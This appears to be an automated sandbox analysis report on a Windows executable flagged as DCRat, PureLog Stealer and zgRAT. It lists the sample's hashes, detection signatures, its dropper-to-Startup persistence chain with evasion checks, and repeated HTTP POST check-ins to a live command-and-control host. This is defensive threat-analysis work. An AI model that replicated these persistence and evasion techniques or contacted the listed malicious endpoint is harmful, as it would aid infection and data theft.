Windows Analysis Report
kIdT4m0aa4.exe

Overview

General Information

Sample name: kIdT4m0aa4.exe (renamed because original name is a hash value)
Original sample name: 55A2312D6062E5BAC6C5F62A0EE42FA2.exe
Analysis ID: 1507297
MD5: 55a2312d6062e5bac6c5f62a0ee42fa2
SHA1: 2271954571874366b20b329f202735959361a01c
SHA256: bce94981e91d899f670e4aa9b06e51f1bbff4960751481b373c119c8373ed481
Tags: DCRat, exe

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Drops PE files to the startup folder
Drops PE files with benign system names
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SLDT)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • kIdT4m0aa4.exe (PID: 3428 cmdline: "C:\Users\user\Desktop\kIdT4m0aa4.exe" MD5: 55A2312D6062E5BAC6C5F62A0EE42FA2)
    • wscript.exe (PID: 5820 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProviderWebSavesNet\KzpapvVcbVWl7x3kYPCfes0ojKXptfYw4GAjwTs.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 4928 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ProviderWebSavesNet\4m3MAufDe8UYuW2ydRhKZQEREfiJBHvyHq5AIcSjywzlT6BxOyJV1br81hHR.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • hostcrt.exe (PID: 6488 cmdline: "C:\ProviderWebSavesNet/hostcrt.exe" MD5: 88340879F7B502B0EEE8F6147CDC70EB)
          • cmd.exe (PID: 5432 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4sBxboqxXs.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 5904 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 5968 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
            • COBPewMCbcSeQUSyEIOt.exe (PID: 764 cmdline: "C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe" MD5: 88340879F7B502B0EEE8F6147CDC70EB)
  • OpenWith.exe (PID: 1368 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • services.exe (PID: 4588 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe" MD5: 88340879F7B502B0EEE8F6147CDC70EB)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
kIdT4m0aa4.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
kIdT4m0aa4.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\ProviderWebSavesNet\hostcrt.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\ProviderWebSavesNet\hostcrt.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

Source | Rule | Description | Author | Strings
0000000B.00000002.4164385410.0000000003213000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000000.00000003.1682046441.000000000708F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000004.00000000.1749800429.0000000000612000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000003.1681650291.000000000678C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0000000B.00000002.4164385410.0000000003385000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.3.kIdT4m0aa4.exe.67da6f2.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.3.kIdT4m0aa4.exe.67da6f2.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
4.0.hostcrt.exe.610000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
4.0.hostcrt.exe.610000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.3.kIdT4m0aa4.exe.70dd6f2.1.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

                                    System Summary

                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProviderWebSavesNet\hostcrt.exe, ProcessId: 6488, TargetFilename: C:\Users\user\Start Menu\Programs\Startup\services.exe
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe" , CommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe, NewProcessName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe" , ProcessId: 4588, ProcessName: services.exe
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\ProviderWebSavesNet\KzpapvVcbVWl7x3kYPCfes0ojKXptfYw4GAjwTs.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\ProviderWebSavesNet\KzpapvVcbVWl7x3kYPCfes0ojKXptfYw4GAjwTs.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\kIdT4m0aa4.exe", ParentImage: C:\Users\user\Desktop\kIdT4m0aa4.exe, ParentProcessId: 3428, ParentProcessName: kIdT4m0aa4.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\ProviderWebSavesNet\KzpapvVcbVWl7x3kYPCfes0ojKXptfYw4GAjwTs.vbe" , ProcessId: 5820, ProcessName: wscript.exe
                                    Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe" , CommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe, NewProcessName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe" , ProcessId: 4588, ProcessName: services.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-08T11:52:08.853157+0200 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 80.211.144.156 | 80 | TCP

                                    AV Detection

                                    Source: kIdT4m0aa4.exeAvira: detected
                                    Source: http://304550cm.n9shka.topAvira URL Cloud: Label: malware
                                    Source: http://304550cm.n9shka.top/Avira URL Cloud: Label: malware
                                    Source: http://304550cm.n9shka.top/jspollgamesqldle.phpAvira URL Cloud: Label: malware
                                    Source: C:\Users\user\Desktop\TLuxYJBs.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\AppData\Local\Temp\4sBxboqxXs.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\ProviderWebSavesNet\KzpapvVcbVWl7x3kYPCfes0ojKXptfYw4GAjwTs.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                    Source: C:\Users\user\Desktop\GcNqxydU.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\BpvsVBNg.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\FxsAqTHc.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                    Source: C:\Users\user\Desktop\IuBreppm.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                    Source: C:\Users\user\Desktop\OwCQqHNY.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
                                    Source: C:\Users\user\Desktop\TLuxYJBs.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\ILIJsLjp.logJoe Sandbox ML: detected
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\JrdzzpEh.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\GcNqxydU.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\BOUJPwoA.logJoe Sandbox ML: detected
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\BpvsVBNg.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\RIIODaxx.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\FxsAqTHc.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\OwCQqHNY.logJoe Sandbox ML: detected
                                    Source: kIdT4m0aa4.exeJoe Sandbox ML: detected
                                    Source: kIdT4m0aa4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDirectory created: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeJump to behavior
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeDirectory created: C:\Program Files\Microsoft\d1eeccb3e1a73cJump to behavior
                                    Source: kIdT4m0aa4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kIdT4m0aa4.exe
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CCA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00CCA69B
                                    Source: C:\Users\user\Desktop\kIdT4m0aa4.exeCode function: 0_2_00CDC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00CDC220
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeFile opened: C:\Users\user\AppData\
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeFile opened: C:\Users\user\
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                                    Source: C:\ProviderWebSavesNet\hostcrt.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh4_2_00007FFD9BC6BC7D
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh11_2_00007FFD9BC7BC7D

                                    Networking

                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49738 -> 80.211.144.156:80
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: Joe Sandbox ViewIP Address: 80.211.144.156 80.211.144.156
                                    Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 380Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1400Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1412Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1400Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global traffic HTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 304550cm.n9shka.top Content-Length: 1412 Expect: 100-continue Connection: Keep-Alive
                                    Source: global traffic HTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 304550cm.n9shka.top Content-Length: 1372 Expect: 100-continue Connection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1400Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /jspollgamesqldle.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 304550cm.n9shka.topContent-Length: 1400Expect: 100-continueConnection: Keep-Alive
